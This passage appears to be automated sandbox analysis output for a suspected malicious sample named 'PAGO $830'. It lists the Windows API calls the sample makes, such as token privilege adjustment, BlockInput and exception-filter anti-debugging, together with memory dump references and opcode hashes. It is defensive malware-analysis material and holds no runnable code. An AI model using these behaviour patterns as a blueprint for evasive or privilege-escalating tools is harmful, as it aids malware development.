                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DA26B4
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DA26C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: fec7374676f6a9fbab85159df38c2207a975472b753c38637d1e70b2ba1250d5
                                                          • Instruction ID: 9b458efc6d851d9e9cc8f4108426302acd1cef489a6cc148de0a2f5fae31d661
                                                          • Opcode Fuzzy Hash: fec7374676f6a9fbab85159df38c2207a975472b753c38637d1e70b2ba1250d5
                                                          • Instruction Fuzzy Hash: 3231D37590221CABCB21DF69D98879CBBB8EF08310F5442DAE40CA6261EB349FC58F55
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE50F8
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DE5156
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00DE51BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 0629740f2a010fe694dfbb73cc02432c0058899f866763ce3bae57c5926259d5
                                                          • Instruction ID: 4708e27b0108b887fe7d5c1302d7f89d13f32b6cf86bc66fd8fa716a4e0deb04
                                                          • Opcode Fuzzy Hash: 0629740f2a010fe694dfbb73cc02432c0058899f866763ce3bae57c5926259d5
                                                          • Instruction Fuzzy Hash: 8F316175A00618DFDB00DF55D884FADBBB4FF48318F188099E805AB356DB72E859CBA1
                                                          APIs
                                                            • Part of subcall function 00D8FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D905E8
                                                            • Part of subcall function 00D8FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90605
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                          • GetLastError.KERNEL32 ref: 00DD168E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                          • String ID:
                                                          • API String ID: 577356006-0
                                                          • Opcode ID: 7cbc9e48b472aa0d3b7dccda647403703ff33c94699869192874664078b66707
                                                          • Instruction ID: f951ec90b871beff820275bd7668922ae6ed8eaceb43da8453b0bea6dfea384b
                                                          • Opcode Fuzzy Hash: 7cbc9e48b472aa0d3b7dccda647403703ff33c94699869192874664078b66707
                                                          • Instruction Fuzzy Hash: 9B11BFB1414204BFD718AF54DC86E6AB7BCEB04710B24862EF45657241DB70FC45CB70
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD5A0
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00DDD5DD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD5E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: d8bb7baba5089739277fc48ef9cdbff21e80f8a3c7e004ea5f1abe7fbf9b490c
                                                          • Instruction ID: 8165d00748ba6ae794a5c32aacaf4a7f4a8ad838ac45421dd1eab1908650c7e8
                                                          • Opcode Fuzzy Hash: d8bb7baba5089739277fc48ef9cdbff21e80f8a3c7e004ea5f1abe7fbf9b490c
                                                          • Instruction Fuzzy Hash: B701B5B1901228BFE7109BADDC45FAFBABCEB09710F104616BA40F7190D2749A0587F0
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD15D0
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DD15E5
                                                          • FreeSid.ADVAPI32(?), ref: 00DD15F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                                          • Instruction ID: 83614cfb4800577c52cef2aff958ad411c1922ee1b61b807b571108fd90ae663
                                                          • Opcode Fuzzy Hash: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                                          • Instruction Fuzzy Hash: F9F0F475950309FFEB00DFE59C89AAEBBBCEB08704F504565A501E2181E775AA489B60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000,?,00DA2879,00000003), ref: 00D94C99
                                                          • TerminateProcess.KERNEL32(00000000,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000,?,00DA2879,00000003), ref: 00D94CA0
                                                          • ExitProcess.KERNEL32 ref: 00D94CB2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 9be45c95c44ec3e287b8a26a2075bcc742b4a788822711dd00c83c7f41bc0d76
                                                          • Instruction ID: bdd1d4fb806dd681d6aa6a80e950bebc645ac6740225190cf9b9e9260f6d1336
                                                          • Opcode Fuzzy Hash: 9be45c95c44ec3e287b8a26a2075bcc742b4a788822711dd00c83c7f41bc0d76
                                                          • Instruction Fuzzy Hash: F1E08C31112208AFCF11AF65DE08E483B79EF45381F148054F8059A133CB3ADD83CBA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /
                                                          • API String ID: 0-2043925204
                                                          • Opcode ID: 5bbe1984a83c9e51259183c4766e43f7c7bf3b6b02d1b364fc5296bc67269a51
                                                          • Instruction ID: 669fd6169470ed57b46d784e0a26bde00ea80922a048d591cad22461f65a920c
                                                          • Opcode Fuzzy Hash: 5bbe1984a83c9e51259183c4766e43f7c7bf3b6b02d1b364fc5296bc67269a51
                                                          • Instruction Fuzzy Hash: 85413B769002196FCF249FB9DC89EBB77B8EB86324F144268F915D7180E6709E81CB74
                                                          APIs
                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00DDE30B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID: DOWN
                                                          • API String ID: 2434400541-711622031
                                                          • Opcode ID: fe8e5dc40d05fd4d9f816880e05820d2a787e2f1b78ec33e184329c28ad2f8de
                                                          • Instruction ID: 099fbf7e26e596b5fbbd02cd009af32bcbe650dd7b1bbf9388cb470dffc91623
                                                          • Opcode Fuzzy Hash: fe8e5dc40d05fd4d9f816880e05820d2a787e2f1b78ec33e184329c28ad2f8de
                                                          • Instruction Fuzzy Hash: 12E08C361CC7223CBA4822157C0AEB7038C8B16335B21120FF900E92C2EE846C8694B9
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00DCDA28
Strings
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
Strings
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.$p#
• API String ID: 0-1086706999
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00DE6836
• FindClose.KERNEL32(00000000), ref: 00DE687F
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DF47B8,?,?,00000035,?), ref: 00DE3702
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DF47B8,?,?,00000035,?), ref: 00DE3712
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD1140), ref: 00DD1018
• CloseHandle.KERNEL32(?,?,00DD1140), ref: 00DD102D
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00DA66F6,00000000,?,00000008,?,?,00DAFE9F,00000000), ref: 00DA6928
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• BlockInput.USER32(00000001), ref: 00DEE9E4
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020961,00D9036E), ref: 00D9095A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
                                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction ID: 8c67385ed3919ec1b017e5fa22e23dbaa888173cab96d1ca060eeca9e4ebd420
                                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction Fuzzy Hash: 4251366173C64566DF389668895D7FF27D9DF02340F1C090AE882D7282C615EE05D7B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a934f786b7c05eebcee8b9298402b5062ecabae02b58a804fea921abc4153aeb
                                                          • Instruction ID: 8145a97dbcd35c4fb745fbf54b83578b3669b0871bad0f62258b723eac6555ae
                                                          • Opcode Fuzzy Hash: a934f786b7c05eebcee8b9298402b5062ecabae02b58a804fea921abc4153aeb
                                                          • Instruction Fuzzy Hash: 92322732E29F414DD7239A35DC22335A689AFB73C5F15D737F82AB59A6EB29C4834100
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8511cb7d894ea1ebfa6b9458b8fc0216307370e309d067fb1a9b4c34a5b9f20c
                                                          • Instruction ID: 27e5c98b6d4bd7a4d3de7fe41f1ac38b51211032cd4b77e25732be3529f95020
                                                          • Opcode Fuzzy Hash: 8511cb7d894ea1ebfa6b9458b8fc0216307370e309d067fb1a9b4c34a5b9f20c
                                                          • Instruction Fuzzy Hash: 8D32C031A0425A8BDF289A2CC894F7DBBA3AB42314F6C813ED596975D1D334ED81CB71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c748cad16ed12a08bccba91346241f3a53be818fe76bba1a94036a09dc59597
                                                          • Instruction ID: f0c406acbd5a204a25d01d897ded657f31333c4e1f1cad99f406baa9d2ea206d
                                                          • Opcode Fuzzy Hash: 7c748cad16ed12a08bccba91346241f3a53be818fe76bba1a94036a09dc59597
                                                          • Instruction Fuzzy Hash: B322ABB1A00609DFDF04DFA9D891AEEB7B1FF48300F148529E85AA7291E735E915CB70
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ec95398e49dc0de059947a7a0ed9010817ea4046769a0aaad9cda50068ae439
                                                          • Instruction ID: 10b883147e5f26ed408edcba49093db6c4bd7e1301214cc685440577c1020236
                                                          • Opcode Fuzzy Hash: 5ec95398e49dc0de059947a7a0ed9010817ea4046769a0aaad9cda50068ae439
                                                          • Instruction Fuzzy Hash: 9102B7B1E00205EFCB05DF65D941AADBBB1FF44300F148169E95A9B291FB31EE64CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction ID: e615ee56321c25e73ee69dbe1e149186ac6f4b5e9dcfb8d2d8522956571de7ec
                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction Fuzzy Hash: 75916B7A2090A34AEF2D467E857403EFFE15A523A131E079ED4F2CA1C1FE24C9659A30
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1dc8d9117bddb97ec7e90e0fbe0cdc06dc0578a042493e1ecb38d62427674a5
                                                          • Instruction ID: 499dff6ea4c13501459f5f368dea942e33e7f3fb9cea7fa6cf6d0bfa22905cab
                                                          • Opcode Fuzzy Hash: e1dc8d9117bddb97ec7e90e0fbe0cdc06dc0578a042493e1ecb38d62427674a5
                                                          • Instruction Fuzzy Hash: 3A618A7172830967DF389A688C92BBE2384DF42704F1C091AE88ADB2C1D611DF428375
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction ID: d958fabf6695cb88a48dab7b69220d4253ed3f47000c9724ec51da5663a558fa
                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction Fuzzy Hash: 6D81747A6090A34ADF2A427E857443EFFE15A523A131E079ED4F2CB1C1EE24D565E630
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction ID: 50a1ed0797b9c98393ff76b050bdfa539ea1e7a08e3ce5ad4bffe692f480ec57
                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction Fuzzy Hash: 0F41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction ID: 9a9be0aa3aced60a474d29a98ae06e1e6a840a98a43689a81d3e45604c275a37
                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction Fuzzy Hash: 4201A478A01109EFCB44DF98C5909AEF7F5FF58714F208699E819A7706D730AE41DB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction ID: e64da5b9e1ec285bbd12b9432117ce2fc3e2add9d8a839b628809943c9a951cc
                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction Fuzzy Hash: D101AF78A00209EFCB44DF98C5909AEF7F5FF48714F208699E809A7706D730AE51EB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00DF2A57
                                                          • DeleteObject.GDI32(00000000), ref: 00DF2A6A
                                                          • DestroyWindow.USER32 ref: 00DF2A79
                                                          • GetDesktopWindow.USER32 ref: 00DF2A94
                                                          • GetWindowRect.USER32(00000000), ref: 00DF2A9B
                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DF2BCA
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DF2BD8
                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C1F
                                                          • GetClientRect.USER32(00000000,?), ref: 00DF2C2B
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DF2C67
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C89
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C9C
